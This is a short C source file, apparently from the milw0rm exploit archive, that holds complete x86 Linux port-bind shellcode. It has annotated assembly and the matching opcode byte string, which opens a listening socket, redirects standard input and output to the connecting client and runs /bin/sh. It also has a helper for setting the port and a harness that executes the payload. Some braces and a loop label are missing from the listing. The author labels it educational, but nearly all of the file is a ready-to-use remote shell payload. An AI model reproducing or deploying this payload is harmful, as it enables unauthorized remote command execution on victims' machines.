* 100 byte Portbind shellcode *
* by Benjamin Orozco - benoror@gmail.com *
* filename: x86-linux-portbind.c *
* discription: x86-linux portbind shellcode. *
* Pretty big but excellent for educational purposes. *
* Use SET_PORT() before using the shellcode. Example: *
* *
* SET_PORT(sc, 31337); *
* *
* ASM Code *
# s = socket(2, 1, 0)
push $0x66 #
pop %eax # 0x66 = socketcall
push $0x1 #
pop %ebx # socket() = 1
xor %ecx,%ecx #
push %ecx # 0
push $0x1 # SOCK_STREAM = 1
push $0x2 # AF_INET = 2
mov %esp,%ecx # Arguments
int $0x80 # EXECUTE - Now %eax have the s fileDescriptor
# bind(s [2, 64713, 0], 0x10)
xor %edx,%edx
push %edx # INADDR_ANY = 0
pushw $0xc9fc # PORT = 64713
pushw $0x2 # AF_INET = 2
mov %esp,%ecx # %ecx holds server struct
push $0x10 # sizeof(server) = 10
push %ecx # server struct
push %eax # s fileDescriptor
mov %esp,%ecx
mov %eax,%esi # now %esi holds s fileDescriptor
push $0x2 #
pop %ebx # bind() = 2
push $0x66 #
pop %eax # 0x66 = socketcall
int $0x80 # On success: %eax = 0
# listen(s, 0)
push $0x66 #
pop %eax # 0x66 = socketcall
push $0x4 #
pop %ebx # listen() = 4
int $0x80 # On success: %eax = 0
# c = accept(s, 0, 0)
xor %ecx,%ecx
push %ecx
push %ecx
push %esi # %esi = s
mov %esp,%ecx # Arguments
push $0x5 #
pop %ebx # accept() = 5
push $0x66 #
pop %eax # 0x66 = socketcall
int $0x80 # EXECUTE - Now %eax have c fileDescriptor
# dup2(c, 2) , dup2(c, 1) , dup2(c, 0)
xchg %eax,%ebx # Put c fileDescriptor on %ebx [for dup2()]
push $0x2
pop %ecx
mov $0x3f,%al # dup2() = 0x3f
int $0x80
dec %ecx
jns dup_loop
# execve("/bin//sh", ["/bin//sh",NULL])
mov $0xb,%al # execve = 11d
push %edx
push $0x68732f2f
push $0x6e69622f
mov %esp,%ebx
push %edx
push %ebx
mov %esp, %ecx
int $0x80
char sc[] =
"\x6a\x66" //push $0x66
"\x58" //pop %eax
"\x6a\x01" //push $0x1
"\x5b" //pop %ebx
"\x31\xc9" //xor %ecx,%ecx
"\x51" //push %ecx
"\x6a\x01" //push $0x1
"\x6a\x02" //push $0x2
"\x89\xe1" //mov %esp,%ecx
"\xcd\x80" //int $0x80
"\x31\xd2" //xor %edx,%edx
"\x52" //push %edx
"\x66\x68\xfc\xc9" //pushw $0xc9fc //PORT
"\x66\x6a\x02" //pushw $0x2
"\x89\xe1" //mov %esp,%ecx
"\x6a\x10" //push $0x10
"\x51" //push %ecx
"\x50" //push %eax
"\x89\xe1" //mov %esp,%ecx
"\x89\xc6" //mov %eax,%esi
"\x6a\x02" //push $0x2
"\x5b" //pop %ebx
"\x6a\x66" //push $0x66
"\x58" //pop %eax
"\xcd\x80" //int $0x80
"\x6a\x66" //push $0x66
"\x58" //pop %eax
"\x6a\x04" //push $0x4
"\x5b" //pop %ebx
"\xcd\x80" //int $0x80
"\x31\xc9" //xor %ecx,%ecx
"\x51" //push %ecx
"\x51" //push %ecx
"\x56" //push %esi
"\x89\xe1" //mov %esp,%ecx
"\x6a\x05" //push $0x5
"\x5b" //pop %ebx
"\x6a\x66" //push $0x66
"\x58" //pop %eax
"\xcd\x80" //int $0x80
"\x93" //xchg %eax,%ebx
"\x6a\x02" //push $0x2
"\x59" //pop %ecx
"\xb0\x3f" //mov $0x3f,%al
"\xcd\x80" //int $0x80
"\x49" //dec %ecx
"\x79\xf9" //jns 48 <dup_loop>
"\xb0\x0b" //mov $0xb,%al
"\x52" //push %edx
"\x68\x2f\x2f\x73\x68" //push $0x68732f2f
"\x68\x2f\x62\x69\x6e" //push $0x6e69622f
"\x89\xe3" //mov %esp,%ebx
"\x52" //push %edx
"\x53" //push %ebx
"\x89\xe1" //mov %esp,%ecx
"\xcd\x80"; //int $0x80
void SET_PORT(char *buf, int port) {
*(unsigned short *)(((buf)+22)) = (port);
char tmp = buf[22];
buf[22] = buf[23];
buf[23] = tmp;
printf("size: %d bytes\n", strlen(sc));
SET_PORT(sc, 33333);
__asm__("call sc");
// milw0rm.com [2006-05-08]